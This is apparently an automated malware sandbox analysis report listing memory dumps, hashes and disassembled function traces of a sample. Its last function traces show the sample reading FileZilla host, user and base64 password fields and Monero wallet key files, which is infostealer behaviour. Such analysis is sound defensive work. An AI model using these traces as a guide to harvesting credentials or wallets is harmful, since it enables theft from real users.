                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: {B_]
                        • API String ID: 0-3332230653
                        • Opcode ID: 36e4755e22a296df083791dad78f12ee7fe11c1b178d54a49b46fe347dc105b7
                        • Instruction ID: dc4959a05129c3607c1aacbfe6431f3b76294523bbeed646a142563b06950ead
                        • Opcode Fuzzy Hash: 36e4755e22a296df083791dad78f12ee7fe11c1b178d54a49b46fe347dc105b7
                        • Instruction Fuzzy Hash: 508118F3A182045BF34C9A2DDC9577ABBC6DB94310F2B863DE686C7784E97958014286
                        Function 011D8135 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e36845f79e87422c68856c610487ca44bec42f5fb05a29e35c6a26de63fc0c5
                        • Instruction ID: 8328776abe26994659539b96a061ebd3856b7801f6fefdfa5bd8a8eecd164641
                        • Opcode Fuzzy Hash: 1e36845f79e87422c68856c610487ca44bec42f5fb05a29e35c6a26de63fc0c5
                        • Instruction Fuzzy Hash: F561D3B260C6049FE708BE28EC8677ABBE5EB58310F16093DE6C5C7340EA7558548B87
                        Function 01130E46 Relevance: .2, Instructions: 202COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d9da529c7ef4d94f38491ef89c9c6c9162fdcab1959dc46d2af4b162f35f8d71
                        • Instruction ID: 5b82e0a95f212fdb01d0346ba167f111a997f9af8f5651415bb0f144f9a777c7
                        • Opcode Fuzzy Hash: d9da529c7ef4d94f38491ef89c9c6c9162fdcab1959dc46d2af4b162f35f8d71
                        • Instruction Fuzzy Hash: 216106F3A087008FE344AE29DD8537ABBE6EBD4720F16893DD6D587784E93948458783
                        Function 010DF5A2 Relevance: .2, Instructions: 201COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 44c8bcc80e45d2e5e13aed41a5a9dea2b6484a6bc0fd35a296700c17960a91a4
                        • Instruction ID: c911837328ce6d537f424831fe610a88c744204ffa72532d8ac4d1499ee4fe64
                        • Opcode Fuzzy Hash: 44c8bcc80e45d2e5e13aed41a5a9dea2b6484a6bc0fd35a296700c17960a91a4
                        • Instruction Fuzzy Hash: 545105B39082209FE3086A2CDD4577AB7D9EF94320F2B863DDAC553784E979180586D6
                        Function 010AE317 Relevance: .2, Instructions: 191COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea7bd7d33e2de64b2ccaaf7c97d87273dde434ef42d0d569b7d15fc886c7f761
                        • Instruction ID: 59fe0b24e759450c18b251cebd5343389cfadd357bd17172bb4e116e6cbdcf55
                        • Opcode Fuzzy Hash: ea7bd7d33e2de64b2ccaaf7c97d87273dde434ef42d0d569b7d15fc886c7f761
                        • Instruction Fuzzy Hash: B951D6F3A1C6049FE308AF29DC9667AB7E5EF94720F16493DD6C583380EA356404C69B
                        Function 0113EF2C Relevance: .2, Instructions: 178COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1839f55e44d76004a18b146060e7e5f9b28e1afe623f05b19686b602174cf23e
                        • Instruction ID: 244557c03e96d90870a0579681f3b1c1ad42fa1ce7c8511983c46794c9fb14d8
                        • Opcode Fuzzy Hash: 1839f55e44d76004a18b146060e7e5f9b28e1afe623f05b19686b602174cf23e
                        • Instruction Fuzzy Hash: ED5123B3E041241BF708A53DDC987A6B696DBD4320F0B423DDE8CE7B84E87A5D0582C1
                        Function 01107D82 Relevance: .2, Instructions: 177COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e5b803e82720317701770a6eb4cbcb5fe0181f4ee8e984f63b2d891bbf562b4e
                        • Instruction ID: 0481b4e86c143f59eb991b948c9853a38e6e1792c5eb47d93befa0d94bfa7f16
                        • Opcode Fuzzy Hash: e5b803e82720317701770a6eb4cbcb5fe0181f4ee8e984f63b2d891bbf562b4e
                        • Instruction Fuzzy Hash: 235155F3A082249BF3086E2DDC4477ABBD6EBD0720F16863DEAC487784E935480587C6
                        Function 010F1844 Relevance: .2, Instructions: 151COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3696f0bc3807b547866e197ebcc6050ba79e7f2baf8a13497019d152df0980d7
                        • Instruction ID: 5ec32c402d3c20b4e5ade91ee544f392a81f72fece1f48b75edda40410b5dafa
                        • Opcode Fuzzy Hash: 3696f0bc3807b547866e197ebcc6050ba79e7f2baf8a13497019d152df0980d7
                        • Instruction Fuzzy Hash: 2341E4B3A083089BF3047E2ADC5877AB7D6EB94320F2B453C87D5433C1ED7958018686
                        Function 012A342D Relevance: .1, Instructions: 100COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1da17c846027980d523ba8621bb81f5d22122002522e2271a12770cd7e5edac2
                        • Instruction ID: 00f9c16c2db34b8f86902e878a93bd171feb006f9c691bf19e2e76880b9bb482
                        • Opcode Fuzzy Hash: 1da17c846027980d523ba8621bb81f5d22122002522e2271a12770cd7e5edac2
                        • Instruction Fuzzy Hash: 2A31BEB250C6009FD30ABF29D88667EFBF5FF98710F06482DD6C583654E6785484CA97
                        Function 0121C4AE Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e0c18ed5d9dbb27a5cdffae61469fb68f5cd5c6b1812578451c6592a91f8ef1b
                        • Instruction ID: d3b40172a02868e9807c3f0e3b13363fd17e72b8524be7d2f12cf7f7e408fc52
                        • Opcode Fuzzy Hash: e0c18ed5d9dbb27a5cdffae61469fb68f5cd5c6b1812578451c6592a91f8ef1b
                        • Instruction Fuzzy Hash: 003169B280C614EFE315AF19D8816BEFBE4EF88761F06492DEAC493600D3315844CB87
                        Function 00E39750 Relevance: .0, Instructions: 15COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                        • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                        • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                        Function 00E30250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E38DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E38E0B
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,00E40DBA,00E40DB7,00E40DB6,00E40DB3), ref: 00E30362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E30369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E30385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E303CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E303DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00E30419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E30463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E30532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E30562
                        • lstrcat.KERNEL32(?,profile: null), ref: 00E30571
                        • lstrcat.KERNEL32(?,url: ), ref: 00E30580
                        • lstrcat.KERNEL32(?,00000000), ref: 00E30593
                        • lstrcat.KERNEL32(?,00E41678), ref: 00E305A2
                        • lstrcat.KERNEL32(?,00000000), ref: 00E305B5
                        • lstrcat.KERNEL32(?,00E4167C), ref: 00E305C4
                        • lstrcat.KERNEL32(?,login: ), ref: 00E305D3
                        • lstrcat.KERNEL32(?,00000000), ref: 00E305E6
                        • lstrcat.KERNEL32(?,00E41688), ref: 00E305F5
                        • lstrcat.KERNEL32(?,password: ), ref: 00E30604
                        • lstrcat.KERNEL32(?,00000000), ref: 00E30617
                        • lstrcat.KERNEL32(?,00E41698), ref: 00E30626
                        • lstrcat.KERNEL32(?,00E4169C), ref: 00E30635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E40DB2), ref: 00E3068E
                        Strings
